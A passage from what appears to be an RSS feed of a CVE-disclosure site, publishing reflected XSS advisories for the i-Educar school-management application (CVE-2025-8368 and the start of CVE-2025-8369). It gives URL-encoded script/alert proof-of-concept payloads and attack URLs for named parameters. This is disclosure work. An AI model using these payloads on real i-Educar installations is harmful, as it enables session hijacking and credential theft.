 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8368</title>
        <link>https://www.cvehunters.com/p/cve-2025-8368/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8368/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8368-multiples-cross-site-scripting-xss-reflected-in-endpoint-pesquisa_pessoa_lstphp&amp;#34;&amp;gt;CVE-2025-8368: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Ealert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;28&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Fscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8368/image.png&amp;#34;
	width=&amp;#34;1527&amp;#34;
	height=&amp;#34;499&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8368/image_hu_ed5558ad0fc1df7d.png 480w, /p/cve-2025-8368/image_hu_9f69f1446734701d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;306&amp;#34;
		data-flex-basis=&amp;#34;734px&amp;#34;
	
&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload can be injected into either of the two parameters. Example attack URLs:&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8368-multiples-cross-site-scripting-xss-reflected-in-endpoint-pesquisa_pessoa_lstphp&amp;#34;&amp;gt;CVE-2025-8368: Multiples Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8368&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Reflected Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt; parameters.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;pesquisa_pessoa_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Ealert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;28&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Fscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8368/image.png&amp;#34;
	width=&amp;#34;1527&amp;#34;
	height=&amp;#34;499&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8368/image_hu_ed5558ad0fc1df7d.png 480w, /p/cve-2025-8368/image_hu_9f69f1446734701d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;306&amp;#34;
		data-flex-basis=&amp;#34;734px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;This payload can be injected into either of the two parameters. Example attack URLs:&amp;lt;/p&amp;gt;
&amp;lt;h4 id=&amp;#34;parameter-campo_busca&amp;#34;&amp;gt;Parameter &amp;lt;code&amp;gt;campo_busca&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  /intranet/pesquisa_pessoa_lst.php?campo_busca=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h4 id=&amp;#34;parameter-cpf&amp;#34;&amp;gt;Parameter &amp;lt;code&amp;gt;cpf&amp;lt;/code&amp;gt;
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  /intranet/pesquisa_pessoa_lst.php?cpf=%22%3E%3Cscript%3Ealert%28%27XSS-PoC%27%29%3C%2Fscript%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8368.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Thu, 31 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8369</title>
        <link>https://www.cvehunters.com/p/cve-2025-8369/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-8369/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8369-cross-site-scripting-xss-reflected-in-endpoint-educar_avaliacao_desempenho_lstphp-parameter-titulo_avaliacao&amp;#34;&amp;gt;CVE-2025-8369: Cross-Site Scripting (XSS) Reflected in endpoint &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8369&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Reflected Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt; parameter.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;educar_avaliacao_desempenho_lst.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;titulo_avaliacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;h4 id=&amp;#34;encoded&amp;#34;&amp;gt;Encoded
&amp;lt;/h4&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;22&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;E&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Cscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Ealert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;28&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;XSS&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;-&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;PoC&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;27&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;29&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;C&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;2&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;Fscript&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;%&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;3&amp;lt;/span&amp;gt;&amp;lt;span 